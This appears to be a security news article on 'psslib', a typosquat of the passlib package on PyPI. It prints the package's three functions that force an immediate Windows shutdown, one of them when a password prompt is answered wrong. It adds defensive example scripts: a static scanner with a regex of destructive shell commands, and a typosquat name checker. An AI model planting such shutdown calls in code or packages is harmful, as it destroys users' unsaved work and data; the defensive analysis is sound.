Malicious Python Package ‘psslib’ Triggers Immediate Windows Shutdowns

A recent discovery has unveiled a malicious Python package named psslib on the Python Package Index (PyPI), designed to disrupt Windows systems by initiating an immediate shutdown whenever an incorrect password is entered. The package is a deceptive typosquat of the legitimate passlib library, a widely used password hashing toolkit with over 8.9 million monthly downloads.

Typosquatting Attack Details

The threat actor, operating under the alias umaraq, published psslib to mimic passlib, aiming to deceive developers into unintentionally installing the malicious package. Typosquatting involves creating packages with names similar to popular libraries, exploiting typographical errors or reliance on autocomplete features during installation. In this case, the subtle difference between psslib and passlib increases the likelihood of accidental installation.

Malicious Functionality

Upon integration into a project, psslib introduces functions that can disrupt Windows systems:

– Password Verification Function (`spc`): This function prompts users to enter a password. If the input doesn’t match the expected value, it executes a system shutdown command, causing the machine to power off within one second.

```python
import os
import easygui

def spc(password):
    # Prompt for a password; any mismatch triggers a Windows shutdown
    if easygui.enterbox('enter password:-') != password:
        os.system('shutdown /s /t 1')  # Shutdown in 1 second
```

– Direct Shutdown Function (`src`): Executes an immediate system shutdown without requiring any user input.

```python
import os

def src():
    # Unconditional Windows shutdown, no user input required
    os.system('shutdown /s /t 1')
```

– Error-Induced Shutdown Function (`error`): Displays an error message and then forces a system shutdown.

```python
import os
import sys

def error(message):
    # Print the supplied message to stderr, then force a Windows shutdown
    sys.stderr.write(message)
    os.system('shutdown /s /t 1')
```

These functions ensure that the malicious payload can execute under various scenarios, leading to immediate system disruption.
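All three payload functions share one trait: a shell-executing call whose argument is a literal destructive command. That pattern is cheap to catch statically before a package is ever imported. The scanner below is an added example written for this article, not code from Socket or from the psslib package; it parses Python source with the standard `ast` module, walks each top-level function (and module-level code, which matters for payloads that run at import time), and reports calls to a small assumed set of shell sinks whose first argument is a string literal matching a destructive-command pattern. The sample module embedded in it is constructed to resemble the functions described above.

```python
import ast
import re

# Constructed sample module resembling the psslib functions described in the article,
# plus one harmless function to show the scanner does not flag ordinary os usage.
SAMPLE_SOURCE = '''
import os
import sys

def spc(password):
    if easygui.enterbox('enter password:-') != password:
        os.system('shutdown /s /t 1')

def src():
    os.system('shutdown /s /t 1')

def error(message):
    sys.stderr.write(message)
    os.system('shutdown /s /t 1')

def harmless():
    return os.path.join('a', 'b')
'''

# Assumed list of shell-executing sinks to inspect (extend as needed).
SHELL_SINKS = {
    ('os', 'system'),
    ('subprocess', 'call'),
    ('subprocess', 'run'),
    ('subprocess', 'Popen'),
}

# Assumed pattern of destructive commands on Windows and POSIX shells.
DESTRUCTIVE = re.compile(
    r'\b(shutdown|reboot|rm\s+-rf|del\s+/[fsq]|format\s+[a-z]:)', re.IGNORECASE
)


def _qualified_name(func):
    """Return ('os', 'system') for a call like os.system(...); None otherwise."""
    if isinstance(func, ast.Attribute) and isinstance(func.value, ast.Name):
        return (func.value.id, func.attr)
    return None


def _scan_node(node, scope, findings):
    """Collect shell-sink calls under `node` whose first argument is a destructive literal."""
    for child in ast.walk(node):
        if not isinstance(child, ast.Call):
            continue
        name = _qualified_name(child.func)
        if name not in SHELL_SINKS or not child.args:
            continue
        arg = child.args[0]
        if (isinstance(arg, ast.Constant) and isinstance(arg.value, str)
                and DESTRUCTIVE.search(arg.value)):
            findings.append({
                'function': scope,
                'line': child.lineno,
                'sink': '.'.join(name),
                'command': arg.value,
            })


def find_destructive_calls(source):
    """Return findings for every top-level function and for module-level code."""
    findings = []
    tree = ast.parse(source)
    for stmt in tree.body:
        if isinstance(stmt, ast.FunctionDef):
            _scan_node(stmt, stmt.name, findings)
        else:
            _scan_node(stmt, '<module>', findings)
    return findings


if __name__ == '__main__':
    for f in find_destructive_calls(SAMPLE_SOURCE):
        print(f"{f['function']}:{f['line']} {f['sink']}({f['command']!r})")
```

Running it against a downloaded sdist or wheel (unpacked, one file at a time) is enough to surface the three functions discussed here. The check is deliberately narrow: it only inspects string literals, so a command assembled at runtime or passed through `shutil.which`-style indirection would not be flagged, and a real pipeline should pair it with dynamic analysis or a sandboxed install.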

Targeted Environment

The attack specifically targets Windows-based development environments, where the shutdown command is effective and its presence in a dependency is easily overlooked. The payload fails harmlessly on Linux and macOS because those systems do not accept the Windows `shutdown /s /t` syntax, so the package's Windows-specific command demonstrates targeted intent.

Potential Impact

The execution of these shutdown commands can result in:

– Loss of unsaved work and data

– Corruption of open files and databases

– Disruption of running services

Such immediate system shutdowns can cause significant workflow disruptions and potential data loss, especially in development environments where unsaved code and configurations are common.

Detection and Response

The malicious nature of psslib was identified by Socket’s AI-powered scanning systems, which flagged the package due to its destructive system shutdown behavior. Despite formal petitions for its removal, the package remains active on PyPI, posing ongoing risks to developers who may inadvertently install it.

Recommendations for Developers

To mitigate the risks associated with malicious packages:

1. Verify Package Names: Carefully check package names for typos or subtle differences before installation.

2. Review Package Details: Examine the package’s metadata, including the author’s information, release history, and user reviews.

3. Utilize Security Tools: Employ tools that can detect and flag potentially malicious packages.

4. Stay Informed: Keep abreast of security advisories related to the packages and libraries you use.
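The first recommendation, verifying package names, can be automated in a pre-install check. The script below is an added example for this article, not a tool from PyPI or Socket; it parses a requirements file, normalizes names the way PyPI does (PEP 503: runs of `-`, `_`, `.` collapse to `-`, lowercase), and flags any name that is not on a known-popular allowlist but is within a small Levenshtein distance of one. The allowlist and the requirements text are constructed for the example; a real deployment would load a much larger list of top packages.

```python
import re

# Constructed allowlist of well-known package names (a real check would use a larger list).
POPULAR = ['passlib', 'requests', 'numpy', 'cryptography', 'urllib3', 'pyyaml']

# Constructed requirements file: two entries are one character away from popular names.
SAMPLE_REQUIREMENTS = """
passlib==1.7.4
psslib
requsts>=2.0   # typo of requests
numpy==1.26
-r other.txt
"""


def normalize(name):
    """PEP 503 name normalization as used by PyPI."""
    return re.sub(r'[-_.]+', '-', name).lower()


def edit_distance(a, b):
    """Levenshtein distance via the classic two-row dynamic programme."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1,            # deletion
                           cur[j - 1] + 1,         # insertion
                           prev[j - 1] + (ca != cb)))  # substitution
        prev = cur
    return prev[-1]


def parse_requirements(text):
    """Extract normalized package names, ignoring comments, blanks and pip options."""
    names = []
    for line in text.splitlines():
        line = line.split('#', 1)[0].strip()
        if not line or line.startswith('-'):
            continue
        # Cut at the first version specifier, extra, marker or whitespace.
        name = re.split(r'[<>=!~\[; ]', line, 1)[0]
        names.append(normalize(name))
    return names


def find_suspects(requirements_text, popular=POPULAR, max_distance=2):
    """Return (requested, lookalike, distance) for names close to a popular package."""
    known = {normalize(p) for p in popular}
    suspects = []
    for name in parse_requirements(requirements_text):
        if name in known:
            continue
        for candidate in sorted(known):
            d = edit_distance(name, candidate)
            if 0 < d <= max_distance:
                suspects.append((name, candidate, d))
    return suspects


if __name__ == '__main__':
    for requested, lookalike, d in find_suspects(SAMPLE_REQUIREMENTS):
        print(f"review '{requested}': distance {d} from popular package '{lookalike}'")
```

Treat a hit as a prompt for review rather than an automatic block: with very short names a distance of 2 produces false positives, and genuinely distinct packages can sit close to each other. Pairing the check with the package's release history and author details (recommendation 2) is what separates a typo from a deliberate lookalike.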

By adopting these practices, developers can reduce the likelihood of integrating malicious packages into their projects, thereby safeguarding their systems and data.